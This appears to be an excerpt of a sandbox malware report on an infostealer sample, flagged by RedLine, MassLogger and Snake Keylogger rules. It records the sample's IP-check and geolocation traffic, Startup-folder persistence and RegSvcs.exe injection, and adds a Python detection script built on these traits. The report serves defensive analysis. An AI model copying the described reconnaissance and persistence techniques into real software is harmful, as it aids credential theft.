2024-12-16 13:11:48 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2024-12-16 13:11:48 UTC | 880 | IN | HTTP/1.1 200 OK
  Date: Mon, 16 Dec 2024 13:11:48 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Cache-Control: max-age=31536000
  CF-Cache-Status: HIT
  Age: 343477
  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
  Accept-Ranges: bytes
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kza8gE1lkb2mu7Y0BLfDyBeyh6iipiGN9vDVxJGKphPw0tVe0%2B1hHXNFFZoqnzdhSqFX%2FNQ%2BK3PbIBeGbKDPLAs0oXSCpmFu1o9GB7%2BL0YXFNxhnMQ4PXs1%2BfmS9OeLBQkBpUs5S"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f2eebdefd68de92-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1457&rtt_var=559&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1937624&cwnd=244&unsent_bytes=0&cid=36213bacfeac7d60&ts=451&x=0"
2024-12-16 13:11:48 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo
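The four HTTP sessions above show one behaviour twice, once per injected RegSvcs.exe instance (PIDs 6660 and 3128): a plain-HTTP GET to checkip.dyndns.org with a hard-coded IE6-era User-Agent, followed within a few seconds by a TLS request to reallyfreegeoip.org for the exact address the first reply returned. Below is an added detection example, not code from the Joe Sandbox report or from the malware, that reconstructs that chain from per-process HTTP events. The event records, the helper names and the 30-second window are assumptions for the example; the request bodies are copied from the "Data Ascii" lines above, with the truncated XML closed so it parses.

```python
"""Flag a process that learns its public IP and then geolocates that same IP.

Added example based on the HTTP sessions in the sandbox report; not part of the report.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Hosts seen in the report's HTTP sessions.
IP_CHECK_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com"}
GEOIP_HOSTS = {"reallyfreegeoip.org"}
# User-Agent the sample sent; no current browser emits this IE6/.NET 1.0 string.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"


@dataclass
class HttpEvent:           # assumed shape of a per-request record (e.g. from a proxy log)
    ts: datetime
    pid: int
    host: str
    path: str
    user_agent: str
    body: bytes            # response body returned for this request


# Constructed sample bodies, taken from the report's "Data Ascii" lines. The report
# truncates the XML after <TimeZone>, so it is closed here to make it well-formed.
CHECKIP_HTML = (b"<html><head><title>Current IP Check</title></head>"
                b"<body>Current IP Address: 8.46.123.189</body></html>\r\n")
GEOIP_XML = (b"<Response>\n\t<IP>8.46.123.189</IP>\n\t<CountryCode>US</CountryCode>\n"
             b"\t<CountryName>United States</CountryName>\n\t<RegionCode>NY</RegionCode>\n"
             b"\t<RegionName>New York</RegionName>\n\t<City>New York</City>\n"
             b"\t<ZipCode>10118</ZipCode>\n\t<TimeZone>America/New_York</TimeZone>\n</Response>")


def _t(hms: str) -> datetime:
    return datetime.strptime("2024-12-16 " + hms, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)


# Constructed events mirroring the report (UTC times, PIDs and paths as captured), plus a
# benign control: a browser that checked its IP once and made no geolocation request.
SAMPLE_EVENTS = [
    HttpEvent(_t("13:11:33"), 6660, "checkip.dyndns.org", "/", LEGACY_UA, CHECKIP_HTML),
    HttpEvent(_t("13:11:36"), 6660, "reallyfreegeoip.org", "/xml/8.46.123.189", "", GEOIP_XML),
    HttpEvent(_t("13:11:45"), 3128, "checkip.dyndns.org", "/", LEGACY_UA, CHECKIP_HTML),
    HttpEvent(_t("13:11:48"), 3128, "reallyfreegeoip.org", "/xml/8.46.123.189", "", GEOIP_XML),
    HttpEvent(_t("13:20:00"), 4242, "checkip.dyndns.org", "/",
              "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/133.0", CHECKIP_HTML),
]

IP_RE = re.compile(rb"Current IP Address:\s*(\d{1,3}(?:\.\d{1,3}){3})")


def parse_checkip_body(body: bytes):
    """Return the address reported by checkip.dyndns.org, or None if absent."""
    m = IP_RE.search(body)
    return m.group(1).decode("ascii") if m else None


def parse_geoip_xml(body: bytes) -> dict:
    """Flatten the <Response> element into {tag: text}.
    ElementTree does not expand external entities, but a production pipeline that parses
    attacker-influenced XML should still prefer defusedxml."""
    root = ET.fromstring(body)
    return {child.tag: (child.text or "").strip() for child in root}


def find_geoip_chains(events, window=timedelta(seconds=30)):
    """Pair each IP-check reply with a later geolocation request for that IP by the same PID."""
    by_pid = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_pid.setdefault(ev.pid, []).append(ev)

    findings = []
    for pid, evs in by_pid.items():
        for i, ev in enumerate(evs):
            if ev.host not in IP_CHECK_HOSTS:
                continue
            ext_ip = parse_checkip_body(ev.body)
            if not ext_ip:
                continue
            for nxt in evs[i + 1:]:                 # evs is time-ordered
                if nxt.ts - ev.ts > window:
                    break
                if nxt.host in GEOIP_HOSTS and ext_ip in nxt.path:
                    geo = parse_geoip_xml(nxt.body)
                    findings.append({
                        "pid": pid,
                        "external_ip": ext_ip,
                        "country_code": geo.get("CountryCode"),
                        "legacy_ua": ev.user_agent == LEGACY_UA,
                        "delay_s": (nxt.ts - ev.ts).total_seconds(),
                    })
                    break
    return findings


if __name__ == "__main__":
    for f in find_geoip_chains(SAMPLE_EVENTS):
        print(f)
```

Keying on the pair (IP check, then geolocation of that exact IP from the same process) rather than on either host alone keeps the rule quiet for users who visit an IP-check site by hand; the legacy User-Agent and the PID of a .NET framework utility such as RegSvcs.exe are additional signals to weight, not requirements.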



                                                                  Target ID:0
                                                                  Start time:08:11:29
                                                                  Start date:16/12/2024
                                                                  Path:C:\Users\user\Desktop\ref_97024130865.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\ref_97024130865.exe"
                                                                  Imagebase:0xfd0000
                                                                  File size:1'112'064 bytes
                                                                  MD5 hash:687AF4583057DD6924F0102DEF1B8F89
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:08:11:30
                                                                  Start date:16/12/2024
                                                                  Path:C:\Users\user\AppData\Local\juvenile\nonplacental.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\ref_97024130865.exe"
                                                                  Imagebase:0x5f0000
                                                                  File size:1'112'064 bytes
                                                                  MD5 hash:687AF4583057DD6924F0102DEF1B8F89
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.2081325248.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 74%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:08:11:31
                                                                  Start date:16/12/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\ref_97024130865.exe"
                                                                  Imagebase:0x8e0000
                                                                  File size:45'984 bytes
                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3296052584.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:4
                                                                  Start time:08:11:42
                                                                  Start date:16/12/2024
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs"
                                                                  Imagebase:0x7ff64b8f0000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:08:11:42
                                                                  Start date:16/12/2024
                                                                  Path:C:\Users\user\AppData\Local\juvenile\nonplacental.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\juvenile\nonplacental.exe"
                                                                  Imagebase:0x5f0000
                                                                  File size:1'112'064 bytes
                                                                  MD5 hash:687AF4583057DD6924F0102DEF1B8F89
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.2197923866.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:08:11:43
                                                                  Start date:16/12/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\juvenile\nonplacental.exe"
                                                                  Imagebase:0x4f0000
                                                                  File size:45'984 bytes
                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3296227369.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                  Reputation:high
                                                                  Has exited:false

                                                                    Execution Graph

                                                                    Execution Coverage:3.5%
                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                    Signature Coverage:6.2%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:173
                                                                    execution_graph: node/edge data behind the interactive execution-graph viewer (function addresses, call edges and "N API calls" annotations). The raw node dump is not reproduced here; API names appearing as node labels in the graph include RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetModuleFileNameW, GetFullPathNameW, LoadLibraryExW, LoadLibraryA, GetProcAddress, FreeLibrary, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, MessageBoxA, AllocateAndInitializeSid, CheckTokenMembership, CreateStreamOnHGlobal, GetOpenFileNameW, SystemParametersInfoW, IsThemeActive, GetSystemTimeAsFileTime, MultiByteToWideChar, ReadFile, SetFilePointerEx and CreateFileW.
105293->105297 105298 100816b 105293->105298 105296 100806a 105294->105296 105295 10080ec GetLastError 105300 ff8b07 __dosmaperr 58 API calls 105295->105300 105301 ff8b28 _free 58 API calls 105296->105301 105302 ff8b07 __dosmaperr 58 API calls 105297->105302 105308 ffd52a __set_osfhnd 59 API calls 105298->105308 105299->105293 105299->105295 105303 1007cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105299->105303 105304 1008111 105300->105304 105301->105280 105305 1008150 CloseHandle 105302->105305 105307 10080e1 105303->105307 105310 ff8b28 _free 58 API calls 105304->105310 105305->105304 105306 100815e 105305->105306 105309 ff8b28 _free 58 API calls 105306->105309 105307->105293 105307->105295 105313 1008189 105308->105313 105311 1008163 105309->105311 105310->105265 105311->105304 105312 1008344 105312->105265 105315 1008517 CloseHandle 105312->105315 105313->105312 105314 10018c1 __lseeki64_nolock 60 API calls 105313->105314 105332 100820a 105313->105332 105316 10081f3 105314->105316 105317 1007cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105315->105317 105318 ff8af4 __write 58 API calls 105316->105318 105316->105332 105320 100853e 105317->105320 105318->105332 105319 1000e5b 70 API calls __read_nolock 105319->105332 105321 1008546 GetLastError 105320->105321 105322 1008572 105320->105322 105323 ff8b07 __dosmaperr 58 API calls 105321->105323 105322->105265 105324 1008552 105323->105324 105327 ffd43d __free_osfhnd 59 API calls 105324->105327 105325 1000add __close_nolock 61 API calls 105325->105332 105326 100823c 105328 10097a2 __chsize_nolock 82 API calls 105326->105328 105326->105332 105327->105322 105328->105326 105329 10018c1 60 API calls __lseeki64_nolock 105329->105332 105330 ffd886 __write 78 API calls 105330->105332 105331 10083c1 105333 1000add __close_nolock 61 API calls 105331->105333 105332->105312 105332->105319 105332->105325 105332->105326 105332->105329 105332->105330 105332->105331 105334 10083c8 105333->105334 
105335 ff8b28 _free 58 API calls 105334->105335 105335->105265 105336->105255 105337->105261 105338->105261 105340 fd4b83 105339->105340 105341 fd4c3f LoadLibraryA 105339->105341 105340->105141 105340->105144 105341->105340 105342 fd4c50 GetProcAddress 105341->105342 105342->105340 105344 fd4ea3 FindResourceExW 105343->105344 105346 fd4ec0 105343->105346 105345 100d933 LoadResource 105344->105345 105344->105346 105345->105346 105347 100d948 SizeofResource 105345->105347 105346->105150 105347->105346 105348 100d95c LockResource 105347->105348 105348->105346 105350 fd4ef4 105349->105350 105351 100d9ab 105349->105351 105355 ff584d 105350->105355 105353 fd4f02 105353->105161 105354->105150 105357 ff5859 _fprintf 105355->105357 105356 ff586b 105368 ff8b28 58 API calls __getptd_noexit 105356->105368 105357->105356 105359 ff5891 105357->105359 105370 ff6c11 105359->105370 105360 ff5870 105369 ff8db6 9 API calls __mbschr_l 105360->105369 105363 ff5897 105376 ff57be 83 API calls 5 library calls 105363->105376 105365 ff58a6 105377 ff58c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 105365->105377 105367 ff587b _fprintf 105367->105353 105368->105360 105369->105367 105371 ff6c43 EnterCriticalSection 105370->105371 105372 ff6c21 105370->105372 105373 ff6c39 105371->105373 105372->105371 105374 ff6c29 105372->105374 105373->105363 105375 ff9c0b __lock 58 API calls 105374->105375 105375->105373 105376->105365 105377->105367 105381 ff55fd 105378->105381 105380 fd4f2e 105380->105169 105382 ff5609 _fprintf 105381->105382 105383 ff564c 105382->105383 105384 ff5644 _fprintf 105382->105384 105386 ff561f _memset 105382->105386 105385 ff6c11 __lock_file 59 API calls 105383->105385 105384->105380 105387 ff5652 105385->105387 105408 ff8b28 58 API calls __getptd_noexit 105386->105408 105394 ff541d 105387->105394 105389 ff5639 105409 ff8db6 9 API calls __mbschr_l 105389->105409 105395 ff5453 105394->105395 105398 ff5438 _memset 105394->105398 105410 ff5686 LeaveCriticalSection 
LeaveCriticalSection __wfsopen 105395->105410 105396 ff5443 105506 ff8b28 58 API calls __getptd_noexit 105396->105506 105398->105395 105398->105396 105401 ff5493 105398->105401 105401->105395 105402 ff55a4 _memset 105401->105402 105411 ff46e6 105401->105411 105418 1000e5b 105401->105418 105486 1000ba7 105401->105486 105508 1000cc8 58 API calls 4 library calls 105401->105508 105509 ff8b28 58 API calls __getptd_noexit 105402->105509 105406 ff5448 105507 ff8db6 9 API calls __mbschr_l 105406->105507 105408->105389 105409->105384 105410->105384 105412 ff4705 105411->105412 105413 ff46f0 105411->105413 105412->105401 105510 ff8b28 58 API calls __getptd_noexit 105413->105510 105415 ff46f5 105511 ff8db6 9 API calls __mbschr_l 105415->105511 105417 ff4700 105417->105401 105419 1000e93 105418->105419 105420 1000e7c 105418->105420 105422 10015cb 105419->105422 105426 1000ecd 105419->105426 105521 ff8af4 58 API calls __getptd_noexit 105420->105521 105537 ff8af4 58 API calls __getptd_noexit 105422->105537 105423 1000e81 105522 ff8b28 58 API calls __getptd_noexit 105423->105522 105428 1000ed5 105426->105428 105436 1000eec 105426->105436 105427 10015d0 105538 ff8b28 58 API calls __getptd_noexit 105427->105538 105523 ff8af4 58 API calls __getptd_noexit 105428->105523 105430 1000e88 105430->105401 105432 1000ee1 105539 ff8db6 9 API calls __mbschr_l 105432->105539 105433 1000eda 105524 ff8b28 58 API calls __getptd_noexit 105433->105524 105435 1000f01 105525 ff8af4 58 API calls __getptd_noexit 105435->105525 105436->105430 105436->105435 105438 1000f1b 105436->105438 105440 1000f39 105436->105440 105438->105435 105443 1000f26 105438->105443 105526 ff881d 58 API calls 2 library calls 105440->105526 105512 1005c6b 105443->105512 105444 1000f49 105445 1000f51 105444->105445 105446 1000f6c 105444->105446 105527 ff8b28 58 API calls __getptd_noexit 105445->105527 105529 10018c1 60 API calls 3 library calls 105446->105529 105447 100103a 105449 10010b3 ReadFile 105447->105449 105454 1001050 
GetConsoleMode 105447->105454 105452 1001593 GetLastError 105449->105452 105453 10010d5 105449->105453 105451 1000f56 105528 ff8af4 58 API calls __getptd_noexit 105451->105528 105456 10015a0 105452->105456 105457 1001093 105452->105457 105453->105452 105461 10010a5 105453->105461 105458 10010b0 105454->105458 105459 1001064 105454->105459 105535 ff8b28 58 API calls __getptd_noexit 105456->105535 105468 1001099 105457->105468 105530 ff8b07 58 API calls 2 library calls 105457->105530 105458->105449 105459->105458 105462 100106a ReadConsoleW 105459->105462 105461->105468 105469 100110a 105461->105469 105472 1001377 105461->105472 105462->105461 105464 100108d GetLastError 105462->105464 105463 10015a5 105536 ff8af4 58 API calls __getptd_noexit 105463->105536 105464->105457 105467 ff2d55 _free 58 API calls 105467->105430 105468->105430 105468->105467 105470 1001176 ReadFile 105469->105470 105477 10011f7 105469->105477 105474 1001197 GetLastError 105470->105474 105484 10011a1 105470->105484 105472->105468 105473 100147d ReadFile 105472->105473 105479 10014a0 GetLastError 105473->105479 105485 10014ae 105473->105485 105474->105484 105475 10012b4 105480 1001264 MultiByteToWideChar 105475->105480 105533 10018c1 60 API calls 3 library calls 105475->105533 105476 10012a4 105532 ff8b28 58 API calls __getptd_noexit 105476->105532 105477->105468 105477->105475 105477->105476 105477->105480 105479->105485 105480->105464 105480->105468 105484->105469 105531 10018c1 60 API calls 3 library calls 105484->105531 105485->105472 105534 10018c1 60 API calls 3 library calls 105485->105534 105487 1000bb2 105486->105487 105491 1000bc7 105486->105491 105573 ff8b28 58 API calls __getptd_noexit 105487->105573 105489 1000bb7 105574 ff8db6 9 API calls __mbschr_l 105489->105574 105492 1000bfc 105491->105492 105500 1000bc2 105491->105500 105575 1005fe4 58 API calls __malloc_crt 105491->105575 105494 ff46e6 __output_l 58 API calls 105492->105494 105495 1000c10 105494->105495 105540 1000d47 
105495->105540 105497 1000c17 105498 ff46e6 __output_l 58 API calls 105497->105498 105497->105500 105499 1000c3a 105498->105499 105499->105500 105501 ff46e6 __output_l 58 API calls 105499->105501 105500->105401 105502 1000c46 105501->105502 105502->105500 105503 ff46e6 __output_l 58 API calls 105502->105503 105504 1000c53 105503->105504 105505 ff46e6 __output_l 58 API calls 105504->105505 105505->105500 105506->105406 105507->105395 105508->105401 105509->105406 105510->105415 105511->105417 105513 1005c83 105512->105513 105514 1005c76 105512->105514 105516 1005c8f 105513->105516 105517 ff8b28 _free 58 API calls 105513->105517 105515 ff8b28 _free 58 API calls 105514->105515 105518 1005c7b 105515->105518 105516->105447 105519 1005cb0 105517->105519 105518->105447 105520 ff8db6 __mbschr_l 9 API calls 105519->105520 105520->105518 105521->105423 105522->105430 105523->105433 105524->105432 105525->105433 105526->105444 105527->105451 105528->105430 105529->105443 105530->105468 105531->105484 105532->105468 105533->105480 105534->105485 105535->105463 105536->105468 105537->105427 105538->105432 105539->105430 105541 1000d53 _fprintf 105540->105541 105542 1000d60 105541->105542 105543 1000d77 105541->105543 105544 ff8af4 __write 58 API calls 105542->105544 105545 1000e3b 105543->105545 105548 1000d8b 105543->105548 105547 1000d65 105544->105547 105546 ff8af4 __write 58 API calls 105545->105546 105549 1000dae 105546->105549 105550 ff8b28 _free 58 API calls 105547->105550 105551 1000db6 105548->105551 105552 1000da9 105548->105552 105558 ff8b28 _free 58 API calls 105549->105558 105553 1000d6c _fprintf 105550->105553 105555 1000dc3 105551->105555 105556 1000dd8 105551->105556 105554 ff8af4 __write 58 API calls 105552->105554 105553->105497 105554->105549 105559 ff8af4 __write 58 API calls 105555->105559 105557 ffd206 ___lock_fhandle 59 API calls 105556->105557 105560 1000dde 105557->105560 105565 1000dd0 105558->105565 105561 1000dc8 105559->105561 105563 1000df1 
105560->105563 105564 1000e04 105560->105564 105562 ff8b28 _free 58 API calls 105561->105562 105562->105565 105566 1000e5b __read_nolock 70 API calls 105563->105566 105568 ff8b28 _free 58 API calls 105564->105568 105567 ff8db6 __mbschr_l 9 API calls 105565->105567 105569 1000dfd 105566->105569 105567->105553 105570 1000e09 105568->105570 105572 1000e33 __read LeaveCriticalSection 105569->105572 105571 ff8af4 __write 58 API calls 105570->105571 105571->105569 105572->105553 105573->105489 105574->105500 105575->105492 105579 ff520a GetSystemTimeAsFileTime 105576->105579 105578 1038f6e 105578->105171 105580 ff5238 __aulldiv 105579->105580 105580->105578 105582 ff5c6c _fprintf 105581->105582 105583 ff5c7e 105582->105583 105584 ff5c93 105582->105584 105595 ff8b28 58 API calls __getptd_noexit 105583->105595 105585 ff6c11 __lock_file 59 API calls 105584->105585 105587 ff5c99 105585->105587 105597 ff58d0 67 API calls 7 library calls 105587->105597 105588 ff5c83 105596 ff8db6 9 API calls __mbschr_l 105588->105596 105591 ff5ca4 105598 ff5cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 105591->105598 105593 ff5cb6 105594 ff5c8e _fprintf 105593->105594 105594->105176 105595->105588 105596->105594 105597->105591 105598->105593 105599->105060 105600->105062 105601->105058 105602->105068 105604 fd9169 Mailbox 105603->105604 105605 100f19f 105604->105605 105608 fd9173 105604->105608 105606 ff0db6 Mailbox 59 API calls 105605->105606 105610 100f1ab 105606->105610 105607 fd917a 105607->105072 105608->105607 105611 fd9c90 59 API calls Mailbox 105608->105611 105610->105610 105611->105608 105612->105078 105613->105079 105615 1039748 __tzset_nolock _wcscmp 105614->105615 105616 fd4f0b 74 API calls 105615->105616 105617 10395dc 105615->105617 105618 1039109 GetSystemTimeAsFileTime 105615->105618 105619 fd4ee5 85 API calls 105615->105619 105616->105615 105617->105089 105617->105117 105618->105615 105619->105615 105621 1038b11 105620->105621 105624 1038b1f 105620->105624 105622 
ff525b 115 API calls 105621->105622 105622->105624 105623 1038b64 105651 1038d91 105623->105651 105624->105623 105625 ff525b 115 API calls 105624->105625 105650 1038b28 105624->105650 105627 1038b49 105625->105627 105627->105623 105629 1038b52 105627->105629 105628 1038ba8 105630 1038bcd 105628->105630 105631 1038bac 105628->105631 105633 ff53a6 __fcloseall 83 API calls 105629->105633 105629->105650 105655 10389a9 105630->105655 105632 1038bb9 105631->105632 105635 ff53a6 __fcloseall 83 API calls 105631->105635 105637 ff53a6 __fcloseall 83 API calls 105632->105637 105632->105650 105633->105650 105635->105632 105637->105650 105638 1038bfb 105664 1038c2b 105638->105664 105639 1038bdb 105640 1038be8 105639->105640 105642 ff53a6 __fcloseall 83 API calls 105639->105642 105644 ff53a6 __fcloseall 83 API calls 105640->105644 105640->105650 105642->105640 105644->105650 105647 1038c16 105649 ff53a6 __fcloseall 83 API calls 105647->105649 105647->105650 105649->105650 105650->105118 105652 1038db6 105651->105652 105654 1038d9f __tzset_nolock _memmove 105651->105654 105653 ff55e2 __fread_nolock 74 API calls 105652->105653 105653->105654 105654->105628 105656 ff571c __crtCompareStringA_stat 58 API calls 105655->105656 105657 10389b8 105656->105657 105658 ff571c __crtCompareStringA_stat 58 API calls 105657->105658 105659 10389cc 105658->105659 105660 ff571c __crtCompareStringA_stat 58 API calls 105659->105660 105661 10389e0 105660->105661 105662 1038d0d 58 API calls 105661->105662 105663 10389f3 105661->105663 105662->105663 105663->105638 